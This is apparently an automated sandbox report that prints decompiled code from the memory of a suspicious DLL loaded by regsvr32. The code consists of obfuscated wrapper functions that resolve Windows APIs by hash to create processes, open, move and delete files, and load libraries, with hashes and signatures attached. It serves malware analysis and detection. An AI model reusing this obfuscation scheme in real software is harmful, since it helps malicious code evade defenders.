				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E00CDBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x00cda994
0x00cda997
0x00cda99c
0x00cda9a1
0x00cda9a7
0x00cda9ae
0x00cda9b5
0x00cda9c2
0x00cda9c5
0x00cda9c8
0x00cda9cf
0x00cda9db
0x00cda9dc
0x00cda9e1
0x00cda9eb
0x00cda9f2
0x00cda9f9
0x00cdaa00
0x00cdaa17
0x00cdaa1a
0x00cdaa2b
0x00cdaa2e
0x00cdaa41
0x00cdaa4c
0x00cdaa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 00CDAA4C

Strings

ijp, xrefs: 00CDA9EB

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: b8d464b823c1bdaac14b93b9de0350631953a8e90477b44988e79a0a037ffed3
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: 062117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19EE404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 00CC338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00CC338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00CC9E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E00CDBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x00cc3391
0x00cc3396
0x00cc339b
0x00cc33a1
0x00cc33a5
0x00cc33ac
0x00cc33b9
0x00cc33bd
0x00cc33c0
0x00cc33c7
0x00cc33d8
0x00cc33db
0x00cc33f2
0x00cc33f5
0x00cc33fc
0x00cc3403
0x00cc340a
0x00cc340e
0x00cc3415
0x00cc341c
0x00cc3427
0x00cc342a
0x00cc3431
0x00cc3444
0x00cc344f
0x00cc3454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 00CC344F

Strings

|[0, xrefs: 00CC33FC

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: fd74f7b7ed8db646215e69ca88a3a2818a66cb235db20146b04e3ac96bcdf253
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 642136B4D00209EFCF04DFA5C94AAEEBBB4FB10304F10818DE424AA250D7B96B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 00CDE373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CDE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00CC9E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E00CDBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x00cde37a
0x00cde37d
0x00cde37f
0x00cde382
0x00cde384
0x00cde389
0x00cde392
0x00cde399
0x00cde3a0
0x00cde3a7
0x00cde3ae
0x00cde3b5
0x00cde3bc
0x00cde3c3
0x00cde3cf
0x00cde3d5
0x00cde3d8
0x00cde3df
0x00cde3e6
0x00cde3ed
0x00cde3f4
0x00cde40b
0x00cde413
0x00cde426
0x00cde42f
0x00cde435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00CD3F2A,00000000), ref: 00CDE42F

Strings

M8, xrefs: 00CDE3ED

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: d2ab3346fe21f95dd30ee1bf761fa07cd998daa8f7e7577d41cb7faaa3d3ab23
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 191129B5D00209EFDF58DFE4C94989EBBB4EB40324F108299E824B6291D7B55B059F91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD46E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CD46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00CC9E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E00CDBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x00cd46e8
0x00cd46ed
0x00cd46ef
0x00cd46f2
0x00cd46f5
0x00cd46f8
0x00cd46f9
0x00cd46fc
0x00cd46ff
0x00cd4702
0x00cd4703
0x00cd4706
0x00cd4709
0x00cd470c
0x00cd470d
0x00cd4710
0x00cd4713
0x00cd4716
0x00cd4717
0x00cd4719
0x00cd471e
0x00cd4727
0x00cd472e
0x00cd4732
0x00cd4739
0x00cd4740
0x00cd4747
0x00cd474e
0x00cd4755
0x00cd475c
0x00cd4763
0x00cd476a
0x00cd4771
0x00cd477d
0x00cd4783
0x00cd4786
0x00cd478d
0x00cd47ae
0x00cd47ca
0x00cd47d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 00CD47CA

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: 1eb6f88087bda4e9d6d889f42c69400cf260e39e5a125f9eb41f2775f511557d
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: 0731F472900248FBDF559F95CD09CDEBFB5FB89314F008148FA2462120D7769A64EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDBF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00CDBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00CC9E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E00CDBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x00cdbf24
0x00cdbf29
0x00cdbf2b
0x00cdbf2e
0x00cdbf2f
0x00cdbf30
0x00cdbf33
0x00cdbf36
0x00cdbf39
0x00cdbf3c
0x00cdbf3f
0x00cdbf42
0x00cdbf43
0x00cdbf44
0x00cdbf49
0x00cdbf53
0x00cdbf5a
0x00cdbf61
0x00cdbf68
0x00cdbf6c
0x00cdbf70
0x00cdbf77
0x00cdbf7e
0x00cdbf85
0x00cdbf9c
0x00cdbfa4
0x00cdbfab
0x00cdbfb2
0x00cdbfb6
0x00cdbfba
0x00cdbfbe
0x00cdbfd1
0x00cdbfe8
0x00cdbfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 00CDBFE8

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: 962f5d21071f3c63f9e0e0dd4c66e6983b0f15395a2ec39ee67d1ced2e30eea8
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: 3B21E57680020DBBCF15DF96D9498DFBFB5FB94748F108198F925A2220D3B68A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CD1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00CC9E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E00CDBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x00cd1b2a
0x00cd1b2d
0x00cd1b2f
0x00cd1b31
0x00cd1b34
0x00cd1b37
0x00cd1b3a
0x00cd1b3b
0x00cd1b3c
0x00cd1b41
0x00cd1b50
0x00cd1b54
0x00cd1b61
0x00cd1b64
0x00cd1b6b
0x00cd1b72
0x00cd1b79
0x00cd1b7d
0x00cd1b84
0x00cd1b8b
0x00cd1b92
0x00cd1b99
0x00cd1ba0
0x00cd1ba7
0x00cd1bae
0x00cd1bc2
0x00cd1bc5
0x00cd1bd8
0x00cd1be5
0x00cd1bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00CD1BE5

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: 1fe54690922caace15ed9bdf51fa76d140d35514088dea1d9d9d452b1799b8dd
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: B02133B5D00208FBDF05DFA5C94A8EEBFB5FB80314F108089E914A6261D3B45B41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD66C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CD66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00CC9E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E00CDBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x00cd66cf
0x00cd66e4
0x00cd66e9
0x00cd66f3
0x00cd66f7
0x00cd66fe
0x00cd6705
0x00cd670c
0x00cd6710
0x00cd6717
0x00cd671e
0x00cd6725
0x00cd6729
0x00cd672d
0x00cd6734
0x00cd673b
0x00cd6742
0x00cd6766
0x00cd6777
0x00cd677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00CD6777

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 0303c18b5810c663f67148eaae045a6b6de5c41b1f6cb03b7a318db47102e100
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: FB1114B2900219FBCF15DF95CC0A8DEBFB4EF95714F108198E92966211D3B18A65EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CCFCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CCFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00CC9E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E00CDBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x00ccfcbc
0x00ccfcbf
0x00ccfcc1
0x00ccfcc3
0x00ccfcc8
0x00ccfcd6
0x00ccfcdb
0x00ccfce0
0x00ccfce7
0x00ccfcee
0x00ccfcf5
0x00ccfcfc
0x00ccfd03
0x00ccfd0d
0x00ccfd13
0x00ccfd16
0x00ccfd1d
0x00ccfd24
0x00ccfd2b
0x00ccfd4f
0x00ccfd58
0x00ccfd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00CCFD58

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: a0a9542ad9584513ba3900913316a1bc72b18f7286e25d02b796aba934d50aa2
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: C3112A75E00218EBDB18DFE5C84A9EEBBB5EB44304F10818DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00CC9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00CC9E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E00CDBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x00cc9eaf
0x00cc9eb2
0x00cc9eb4
0x00cc9eb8
0x00cc9eb9
0x00cc9ebe
0x00cc9ec8
0x00cc9ecf
0x00cc9ed6
0x00cc9edd
0x00cc9ee1
0x00cc9ee5
0x00cc9eec
0x00cc9ef3
0x00cc9efa
0x00cc9f01
0x00cc9f08
0x00cc9f0f
0x00cc9f16
0x00cc9f1d
0x00cc9f24
0x00cc9f48
0x00cc9f51
0x00cc9f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00CC9F51

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 127e43c880ad8fd7a94b88831012c3412681ee108db6ab3cd7839e9982d4dd22
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: 1D1118B1C11619EBDF48DFA4D94A8DEBBB4EF10318F108288E825A6250E7B45B589F91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCBA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00CCBA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E00CDBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x00ccbaa2
0x00ccbaa9
0x00ccbaad
0x00ccbab4
0x00ccbabb
0x00ccbabf
0x00ccbac6
0x00ccbacd
0x00ccbad4
0x00ccbadb
0x00ccbae6
0x00ccbaee
0x00ccbaf6
0x00ccbafa
0x00ccbb12
0x00ccbb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 00CCBB1D

Memory Dump Source

Source File: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000009.00000002.733701016.0000000000CC0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.733717497.0000000000CE4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 35ace87c2b2f44066622c9d2c91bd7e9b308c2bdfb93cd23425e6aed33321dd6
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: AB010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F108599E821B7211D7B55B04DF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2812, Parent PID: 3060COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1055
Total number of Limit Nodes:	16

Executed Functions

Function 0024F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0024F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00249E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
